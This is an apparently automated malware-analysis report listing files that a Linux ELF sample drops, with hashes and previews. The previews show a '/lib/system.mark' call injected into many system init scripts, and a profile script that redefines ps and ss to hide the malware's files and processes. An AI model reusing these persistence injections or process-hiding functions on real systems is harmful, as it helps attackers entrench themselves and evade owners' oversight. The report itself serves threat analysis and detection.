SHA-512:	FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.307601355730172
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
MD5:	0F6B71C6CC119B9DDB34511BD4CF6A49
SHA1:	F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
SHA-256:	6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
SHA-512:	EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.281955883729912
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
MD5:	F42950D3F937B049D8ECC88A59A65CA3
SHA1:	E74080DDEE0664F4069E7558C68D2795B752DC55
SHA-256:	6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
SHA-512:	15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.254527998623176
Encrypted:	false
SSDEEP:	12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	CBFDB92FECA62D963DF3A25F15C3E88D
SHA1:	14A84AD6ACD0DDD5777C86FAC10894212CE44F57
SHA-256:	84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
SHA-512:	1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
Malicious:	true
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.255106060955411
Encrypted:	false
SSDEEP:	96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
MD5:	4D1E075A3D6AB76CE7754595802D6C77
SHA1:	F44434087B007BABB314B8277FFC731930DF0A13
SHA-256:	5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
SHA-512:	59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.277181564959481
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
MD5:	816DFAE328401DBA31A79591D3EBC3F2
SHA1:	C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
SHA-256:	72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
SHA-512:	62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.008592969018552
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
MD5:	0F06F605D05EA59E83CFDB744A720668
SHA1:	ED458D2DC1CF9F7EEACF612295016DD4C67FA431
SHA-256:	1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
SHA-512:	B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.012565313964516
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
MD5:	8EFA67FAE6C01453D5F673251C44E223
SHA1:	ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
SHA-256:	48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
SHA-512:	306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.743587167790472
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
MD5:	5D4D9388F89B176957FDD414AF0D3385
SHA1:	206408E65660EFF14DE046FBECC38DDA2BCD403F
SHA-256:	9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
SHA-512:	CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.078291501927291
Encrypted:	false
SSDEEP:	96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
MD5:	53996396D16C98D4AF1BF71D33AE801F
SHA1:	D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
SHA-256:	D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
SHA-512:	34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.991252121789465
Encrypted:	false
SSDEEP:	96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
MD5:	6B8B951DD1036426916D86617F889FB3
SHA1:	5845C804AEE0A2C89AA314083FDB112D90B0AE75
SHA-256:	672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
SHA-512:	DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
Malicious:	true
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.762470767686369
Encrypted:	false
SSDEEP:	48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
MD5:	8852A1EF1E949822CC57D126739775E7
SHA1:	BB530632CE040ACF6D772A83E55594AE03233D2A
SHA-256:	D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
SHA-512:	428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.3259172883252655
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
MD5:	D520212A01E843BEC46C2A22FAD820FD
SHA1:	53E168B97E300038916C1038B59912B23AB2C0AF
SHA-256:	89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
SHA-512:	E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.2132074992430075
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
MD5:	4A25430D50590B5FD530703742868720
SHA1:	FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
SHA-256:	0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
SHA-512:	15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.896684913637708
Encrypted:	false
SSDEEP:	48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
MD5:	ED4AAC2A7BFA47958A11198C382AF668
SHA1:	3646EAC456824AA2D579E5E66F8050CC886C44E7
SHA-256:	8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
SHA-512:	AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
Malicious:	true
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system.mar

/etc/profile.d/bash.cfg.sh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.204582217613529
Encrypted:	false
SSDEEP:	3:TKH/binKX:siKX
MD5:	5C67BC6A39813CE4346CB7CA206A9393
SHA1:	F99586987650CFA169F5110198CBDE17B82FD2BA
SHA-256:	29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
SHA-512:	BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash.cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (705)
Category:	dropped
Size (bytes):	4904
Entropy (8bit):	4.826949277908091
Encrypted:	false
SSDEEP:	96:sSr2vBOPmf2/ySr2vBOPmf2/sSr2vBOPmf2/sSr2vBOPmf2/ySr2vBOPmf2/aSrs:si2vBOPmf2/yi2vBOPmf2/si2vBOPmfT
MD5:	FB5092C6757B35DFD9CC7B755C507463
SHA1:	8FDCE8F23360026B3D62C9E396D5462C380F49E7
SHA-256:	6D2B21320E12F8750D3B41A0229585FDF923DC3618C5B249800484126269A446
SHA-512:	223B51030E765FE129DB9FAEA1F05CA4678EF5B7ED88DA107A812C2C8262DE2DDB8484A6F41D9FF7D225CDA7EA0850DCBFCF8BC28B71048CEFB8C0A7699D92C3
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" \| sed -e '/system.mark/d');proc_name=$(echo "$proc_name" \| sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/ausNOyj9by.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
